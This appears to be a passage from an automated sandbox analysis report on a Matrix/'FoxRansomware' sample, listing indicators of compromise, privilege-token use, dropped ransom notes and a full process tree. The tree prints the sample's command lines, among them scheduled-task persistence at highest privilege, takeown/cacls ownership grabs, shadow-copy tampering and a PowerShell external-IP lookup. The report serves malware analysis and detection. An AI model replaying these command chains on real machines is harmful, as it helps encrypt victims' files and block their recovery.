Files\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: yMelI2Cu64.exe File opened (read-only) \??\X: yMelI2Cu64.exe File opened (read-only) \??\Z: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\L: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\E: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\J: yMelI2Cu64.exe File opened (read-only) \??\O: yMelI2Cu64.exe File opened (read-only) \??\P: yMelI2Cu64.exe File opened (read-only) \??\O: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\S: yMelI2Cu64.exe File opened (read-only) \??\T: yMelI2Cu64.exe File opened (read-only) \??\V: yMelI2Cu64.exe File opened (read-only) \??\X: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\W: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\I: yMelI2Cu64.exe File opened (read-only) \??\L: yMelI2Cu64.exe File opened (read-only) \??\M: yMelI2Cu64.exe File opened (read-only) \??\R: yMelI2Cu64.exe File opened (read-only) \??\Q: yMelI2Cu64.exe File opened (read-only) \??\T: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\P: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\K: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\A: yMelI2Cu64.exe File opened (read-only) \??\B: yMelI2Cu64.exe File opened (read-only) \??\K: yMelI2Cu64.exe File opened (read-only) \??\G: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\E: yMelI2Cu64.exe File opened (read-only) \??\N: yMelI2Cu64.exe File opened (read-only) \??\Y: yMelI2Cu64.exe File opened (read-only) \??\Y: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\S: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\Q: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\M: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\I: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\W: yMelI2Cu64.exe File opened (read-only) \??\U: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\R: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\N: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\J: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\H: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\G: yMelI2Cu64.exe File opened (read-only) \??\V: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\H: yMelI2Cu64.exe File opened (read-only) \??\Z: yMelI2Cu64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 150 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\u1Aercwu.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\106.0.5249.119.manifest 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\gstreamer.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoCanary.png 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Advertising.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdeps.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\xalan.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\af.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\glib.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\icudtl.dat 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_zh_TW.properties 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoBeta.png 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\gu.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\Microsoft.WindowsDesktop.App.deps.json 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\jfr.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\tt.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xalan.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\uk.pak.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\directshow.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ka.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload\preloaded_data.pb 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\relaxngom.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\mi.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\fontconfig.properties.src 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\mesa3d.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\zipfs.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\gu.pak.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstatd.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\sa-jdi.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xmlresolver.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\de.pak.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cldr.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MLModels\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome.dll.sig 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\lb.pak.DATA 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_ko.properties 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\ro.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\id.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\fr.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\jopt-simple.md 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7412 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7456 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4692 powershell.exe 4692 powershell.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe 5712 yMelI2Cu64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 5712 yMelI2Cu64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4692 powershell.exe Token: SeTakeOwnershipPrivilege 1056 takeown.exe Token: SeDebugPrivilege 5712 yMelI2Cu64.exe Token: SeLoadDriverPrivilege 5712 yMelI2Cu64.exe Token: SeBackupPrivilege 7504 vssvc.exe Token: SeRestorePrivilege 7504 vssvc.exe Token: SeAuditPrivilege 7504 vssvc.exe Token: SeIncreaseQuotaPrivilege 7732 WMIC.exe Token: SeSecurityPrivilege 7732 WMIC.exe Token: SeTakeOwnershipPrivilege 7732 WMIC.exe Token: SeLoadDriverPrivilege 7732 WMIC.exe Token: SeSystemProfilePrivilege 7732 WMIC.exe Token: SeSystemtimePrivilege 7732 WMIC.exe Token: SeProfSingleProcessPrivilege 7732 WMIC.exe Token: SeIncBasePriorityPrivilege 7732 WMIC.exe Token: SeCreatePagefilePrivilege 7732 WMIC.exe Token: SeBackupPrivilege 7732 WMIC.exe Token: SeRestorePrivilege 7732 WMIC.exe Token: SeShutdownPrivilege 7732 WMIC.exe Token: SeDebugPrivilege 7732 WMIC.exe Token: SeSystemEnvironmentPrivilege 7732 WMIC.exe Token: SeRemoteShutdownPrivilege 7732 WMIC.exe Token: SeUndockPrivilege 7732 WMIC.exe Token: SeManageVolumePrivilege 7732 WMIC.exe Token: 33 7732 WMIC.exe Token: 34 7732 WMIC.exe Token: 35 7732 WMIC.exe Token: 36 7732 WMIC.exe Token: SeIncreaseQuotaPrivilege 7732 WMIC.exe Token: SeSecurityPrivilege 7732 WMIC.exe Token: SeTakeOwnershipPrivilege 7732 WMIC.exe Token: SeLoadDriverPrivilege 7732 WMIC.exe Token: SeSystemProfilePrivilege 7732 WMIC.exe Token: SeSystemtimePrivilege 7732 WMIC.exe Token: SeProfSingleProcessPrivilege 7732 WMIC.exe Token: SeIncBasePriorityPrivilege 7732 WMIC.exe Token: SeCreatePagefilePrivilege 7732 WMIC.exe Token: SeBackupPrivilege 7732 WMIC.exe Token: SeRestorePrivilege 7732 WMIC.exe Token: SeShutdownPrivilege 7732 WMIC.exe Token: SeDebugPrivilege 7732 WMIC.exe Token: SeSystemEnvironmentPrivilege 7732 WMIC.exe Token: SeRemoteShutdownPrivilege 7732 WMIC.exe Token: SeUndockPrivilege 7732 WMIC.exe Token: SeManageVolumePrivilege 7732 WMIC.exe Token: 33 7732 WMIC.exe Token: 34 7732 WMIC.exe Token: 35 7732 WMIC.exe Token: 36 7732 WMIC.exe Token: SeTakeOwnershipPrivilege 7624 takeown.exe Token: SeTakeOwnershipPrivilege 6232 takeown.exe Token: SeTakeOwnershipPrivilege 5456 takeown.exe Token: SeTakeOwnershipPrivilege 2460 takeown.exe Token: SeTakeOwnershipPrivilege 6048 takeown.exe Token: SeTakeOwnershipPrivilege 7436 takeown.exe Token: SeTakeOwnershipPrivilege 7884 takeown.exe Token: SeTakeOwnershipPrivilege 7744 takeown.exe Token: SeTakeOwnershipPrivilege 7972 takeown.exe Token: SeTakeOwnershipPrivilege 6292 takeown.exe Token: SeTakeOwnershipPrivilege 6908 takeown.exe Token: SeTakeOwnershipPrivilege 5280 takeown.exe Token: SeTakeOwnershipPrivilege 6824 takeown.exe Token: SeTakeOwnershipPrivilege 7064 takeown.exe Token: SeTakeOwnershipPrivilege 5080 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 832 wrote to memory of 1684 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 84 PID 832 wrote to memory of 1684 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 84 PID 832 wrote to memory of 1684 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 84 PID 832 wrote to memory of 4932 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 86 PID 832 wrote to memory of 4932 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 86 PID 832 wrote to memory of 4932 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 86 PID 832 wrote to memory of 4316 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 88 PID 832 wrote to memory of 4316 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 88 PID 832 wrote to memory of 4316 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 88 PID 4316 wrote to memory of 4692 4316 cmd.exe 90 PID 4316 wrote to memory of 4692 4316 cmd.exe 90 PID 4316 wrote to memory of 4692 4316 cmd.exe 90 PID 832 wrote to memory of 2528 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 91 PID 832 wrote to memory of 2528 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 91 PID 832 wrote to memory of 2528 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 91 PID 832 wrote to memory of 4588 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 92 PID 832 wrote to memory of 4588 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 92 PID 832 wrote to memory of 4588 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 92 PID 4588 wrote to memory of 2348 4588 cmd.exe 95 PID 4588 wrote to memory of 2348 4588 cmd.exe 95 PID 4588 wrote to memory of 2348 4588 cmd.exe 95 PID 2528 wrote to memory of 3264 2528 cmd.exe 96 PID 2528 wrote to memory of 3264 2528 cmd.exe 96 PID 2528 wrote to memory of 3264 2528 cmd.exe 96 PID 832 wrote to memory of 5236 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 97 PID 832 wrote to memory of 5236 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 97 PID 832 wrote to memory of 5236 832 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 97 PID 2348 wrote to memory of 6456 2348 wscript.exe 100 PID 2348 wrote to memory of 6456 2348 wscript.exe 100 PID 2348 wrote to memory of 6456 2348 wscript.exe 100 PID 2528 wrote to memory of 7172 2528 cmd.exe 102 PID 2528 wrote to memory of 7172 2528 cmd.exe 102 PID 2528 wrote to memory of 7172 2528 cmd.exe 102 PID 2528 wrote to memory of 7244 2528 cmd.exe 103 PID 2528 wrote to memory of 7244 2528 cmd.exe 103 PID 2528 wrote to memory of 7244 2528 cmd.exe 103 PID 6456 wrote to memory of 7412 6456 cmd.exe 104 PID 6456 wrote to memory of 7412 6456 cmd.exe 104 PID 6456 wrote to memory of 7412 6456 cmd.exe 104 PID 5236 wrote to memory of 7148 5236 cmd.exe 105 PID 5236 wrote to memory of 7148 5236 cmd.exe 105 PID 5236 wrote to memory of 7148 5236 cmd.exe 105 PID 2348 wrote to memory of 2680 2348 wscript.exe 106 PID 2348 wrote to memory of 2680 2348 wscript.exe 106 PID 2348 wrote to memory of 2680 2348 wscript.exe 106 PID 2680 wrote to memory of 5156 2680 cmd.exe 108 PID 2680 wrote to memory of 5156 2680 cmd.exe 108 PID 2680 wrote to memory of 5156 2680 cmd.exe 108 PID 5236 wrote to memory of 1056 5236 cmd.exe 109 PID 5236 wrote to memory of 1056 5236 cmd.exe 109 PID 5236 wrote to memory of 1056 5236 cmd.exe 109 PID 5236 wrote to memory of 7584 5236 cmd.exe 111 PID 5236 wrote to memory of 7584 5236 cmd.exe 111 PID 5236 wrote to memory of 7584 5236 cmd.exe 111 PID 7584 wrote to memory of 5636 7584 cmd.exe 112 PID 7584 wrote to memory of 5636 7584 cmd.exe 112 PID 7584 wrote to memory of 5636 7584 cmd.exe 112 PID 5636 wrote to memory of 5712 5636 yMelI2Cu.exe 113 PID 5636 wrote to memory of 5712 5636 yMelI2Cu.exe 113 PID 6084 wrote to memory of 7456 6084 cmd.exe 115 PID 6084 wrote to memory of 7456 6084 cmd.exe 115 PID 6084 wrote to memory of 7732 6084 cmd.exe 118 PID 6084 wrote to memory of 7732 6084 cmd.exe 118 PID 6084 wrote to memory of 7892 6084 cmd.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWMrNpDd.exe"2⤵PID:1684
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWMrNpDd.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWMrNpDd.exe" -n2⤵
- Executes dropped EXE
PID:4932
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\JOUprH0V.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\u1Aercwu.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\u1Aercwu.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:3264
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:7172
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:7244
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yj8mATiX.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yj8mATiX.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wiCcwVPm.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:6456 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wiCcwVPm.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:7412
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:5156
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:5236 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:7148
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:7584 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5636 -
C:\Users\Admin\AppData\Local\Temp\yMelI2Cu64.exeyMelI2Cu.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:5712
-
-
-
-
-
